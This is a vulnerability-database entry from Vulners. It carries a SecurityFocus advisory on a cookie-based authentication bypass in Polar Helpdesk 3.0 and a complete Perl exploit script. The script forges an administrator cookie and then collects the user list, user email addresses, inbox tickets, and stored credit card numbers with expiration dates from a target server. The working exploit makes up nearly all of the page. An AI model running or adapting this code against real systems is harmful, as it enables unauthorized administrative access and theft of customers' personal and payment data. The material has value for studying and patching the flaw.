Vulners
Lucene search
Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability
source: http://www.securityfocus.com/bid/10775/info
Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based entirely on the values read from a cookie that is saved on the client system. An attacker may modify values in the appropriate cookie to gain administrative access to the affected software.
#!/usr/bin/perl
#
# Beyond Security Ltd.
# The below sample will do:
# 1) Grab a user list
# 2) Grab each user's email
# 3) List all available Inbox tickets
# 4) List all tickets with charge on them, and the credit card number and their expiration date
use IO::Socket;
use strict;
my $host = $ARGV[0];
my $base_path = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "80"
);
unless ($remote) { die "cannot connect to http daemon on $host" }
print "connected\n";
$remote->autoflush(1);
my $content = "txtPassword=admin&txtEmail=admin\@admin&Submit=Log+in";
my $length = length($content);
my $base_path = $ARGV[1];
print "Get user list\n";
my $data_get_userlist = "GET /$base_path/user/modifyprofiles.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
print $remote $data_get_userlist;
# print $data_get_userlist;
sleep(1);
my @names;
while (<$remote>)
{
if (/<td>Results /)
{
while (/<a href="profileinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/g)
{
my $Item;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "ID: ".$Item->{ID}." Name: ".$Item->{Name}."\n";
push @names, $Item;
}
}
}
close $remote;
print "Get users' email\n";
my $data_get_userdata = "";
foreach my $name (@names)
{
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
$data_get_userdata = "GET /$base_path/user/profileinfo.asp?ID=".$name->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
print $remote $data_get_userdata;
# print $data_get_userdata;
sleep(1);
while (<$remote>)
{
if (/name="txtEmail" value="/)
{
/name="txtEmail" value="([^"]+)"/;
print "ID: ".$name->{ID}.", Email: $1\n";
}
}
close($remote);
}
print "Get Inbox tickets\n";
my $data_get_inboxtickets = "GET /$base_path/ticketsupport/Tickets.asp?ID=4 HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_inboxtickets;
#print $data_get_inboxtickets;
sleep(1);
while (<$remote>)
{
if (/Ticket #/)
{
# print $_;
while (/<a href="tickets.asp\?ID=4&Personal=&TicketID=([0-9]+)[^>]+>([^<]+)<\/a>/g)
{
print "Ticket ID: $1, Name: $2\n";
}
}
}
close($remote);
print "Get billing information\n";
my $data_get_billing = "GET /$base_path/billing/billingmanager_income.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_billing;
sleep(1);
my @tickets;
while (<$remote>)
{
if (/Ticket No./)
{
my $Item;
/<a href="..\/ticketsupport\/ticketinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "Ticket ID: ".$Item->{ID}.", Name: ".$Item->{Name}."\n";
push @tickets, $Item;
}
}
close($remote);
foreach my $ticket (@tickets)
{
my $data_get_billingcreditcard = "GET /$base_path/billing/billingmanager_ticketinfo.asp?ID=".$ticket->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print $remote $data_get_billingcreditcard;
sleep(1);
my $Count = 0;
my $Print = 0;
while (<$remote>)
{
if ($Print)
{
$Count ++;
if ($Count > 1)
{
/<td[^>]+>([^<]+)<\/td>/;
print $1, "\n";
$Print = 0;
}
}
if (/Expiration date<br>/)
{
print "Expiration date: ";
$Count = 0;
$Print = 1;
}
if (/Credit Card<br>/)
{
print "Credit Card: ";
$Count = 0;
$Print = 1;
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1